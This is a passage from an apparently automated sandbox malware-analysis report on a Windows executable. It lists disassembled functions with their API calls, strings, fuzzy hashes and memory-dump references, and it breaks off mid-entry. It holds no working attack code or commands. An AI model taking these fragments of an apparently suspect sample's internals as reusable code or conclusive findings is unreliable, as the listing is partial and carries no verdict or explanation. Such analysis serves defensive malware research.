                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                        • String ID:
                                                                                        • API String ID: 3096461208-0
                                                                                        • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                                                        • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                                                                                        • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                                                        • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                                                                                        Function 0040201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                                                                        • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                                                                                        • DeleteObject.GDI32(00000000), ref: 0043BD1C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 641708696-0
                                                                                        • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                                        • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                                                                                        • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                                        • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                                                                                        Function 004021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                        • GetSysColor.USER32(0000000F), ref: 004021D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 259745315-0
                                                                                        • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                                                        • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                                                                                        • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                                                        • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                                                                                        Function 0046A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                                                                                        • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                                                                                        • _wcscpy.LIBCMT ref: 0046A9FF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                        • API String ID: 2820617543-1000479233
                                                                                        • Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                                                        • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                                                                                        • Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                                                        • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                                                                                        Function 00409837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __i64tow__itow__swprintf
                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                        • API String ID: 421087845-2263619337
                                                                                        • Opcode ID: 58044c0a26a6084d0cbe72c45d418c5bf3f68bbb4077ada220d536017fe0ade9
                                                                                        • Instruction ID: 743c89ec1be8f3b6cfe40c528e2526a533573b02274d3a1687b28713588ebf87
                                                                                        • Opcode Fuzzy Hash: 58044c0a26a6084d0cbe72c45d418c5bf3f68bbb4077ada220d536017fe0ade9
                                                                                        • Instruction Fuzzy Hash: AB41D772A10205AFDB24EF35D841A7673E8EF09304F20487FE549E6393EA3D9D068B19
                                                                                        Function 00487152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0048716A
                                                                                        • CreateMenu.USER32 ref: 00487185
                                                                                        • SetMenu.USER32(?,00000000), ref: 00487194
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                                                                                        • IsMenu.USER32(?), ref: 00487237
                                                                                        • CreatePopupMenu.USER32 ref: 00487241
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                                                                                        • DrawMenuBar.USER32 ref: 00487276
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                        • String ID: 0$F
                                                                                        • API String ID: 176399719-3044882817
                                                                                        • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                                                        • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                                                                                        • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                                                        • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                                                                                        Function 004874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00487580
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                                                                                        • DeleteDC.GDI32(00000000), ref: 00487594
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                        • String ID: static
                                                                                        • API String ID: 2559357485-2160076837
                                                                                        • Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                                                                        • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                                                                                        • Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                                                                        • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                                                                                        Function 00426E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00426E3E
                                                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                        • __gmtime64_s.LIBCMT ref: 00426ED7
                                                                                        • __gmtime64_s.LIBCMT ref: 00426F0D
                                                                                        • __gmtime64_s.LIBCMT ref: 00426F2A
                                                                                        • __allrem.LIBCMT ref: 00426F80
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                                                                                        • __allrem.LIBCMT ref: 00426FB3
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                                                                                        • __allrem.LIBCMT ref: 00426FE8
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                                                                                        • __invoke_watson.LIBCMT ref: 00427077
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                        • String ID:
                                                                                        • API String ID: 384356119-0
                                                                                        • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                        • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                                                                                        • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                        • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                                                                                        Function 00462527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00462542
                                                                                        • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                                                                                        • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                                                                                        • Sleep.KERNEL32(000001F4), ref: 004625EB
                                                                                        • GetMenuItemCount.USER32(?), ref: 0046262F
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                                                                                        • GetMenuItemID.USER32(?,?), ref: 004626BA
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4176008265-0
                                                                                        • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                                        • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                                                                                        • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                                        • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                                                                                        Function 00486F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                                                                                        • _memset.LIBCMT ref: 00486FDD
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 830647256-0
                                                                                        • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                                        • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                                                                                        • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                                        • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                                                                                        Function 00456B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                                                                                        • VariantInit.OLEAUT32(?), ref: 00456C2A
                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                                                                                        • VariantClear.OLEAUT32(?), ref: 00456CC6
                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                                                                                        • VariantClear.OLEAUT32(?), ref: 00456CEE
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                        • String ID:
                                                                                        • API String ID: 2706829360-0
                                                                                        • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                                        • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                                                                                        • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                                        • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                                                                                        Function 004783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • CoInitialize.OLE32 ref: 00478403
                                                                                        • CoUninitialize.OLE32 ref: 0047840E
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                                                                                        • IIDFromString.OLE32(?,?), ref: 004784E1
                                                                                        • VariantInit.OLEAUT32(?), ref: 0047857B
                                                                                        • VariantClear.OLEAUT32(?), ref: 004785DC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                        • API String ID: 834269672-1287834457
                                                                                        • Opcode ID: c04c75621ce49cc5f6b0995f70e74a0e3f94a869c5641639a45c403aad8c8130
                                                                                        • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                                                                                        • Opcode Fuzzy Hash: c04c75621ce49cc5f6b0995f70e74a0e3f94a869c5641639a45c403aad8c8130
                                                                                        • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                                                                                        Function 00475732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00475793
                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 004757D8
                                                                                        • gethostbyname.WSOCK32(?), ref: 004757E4
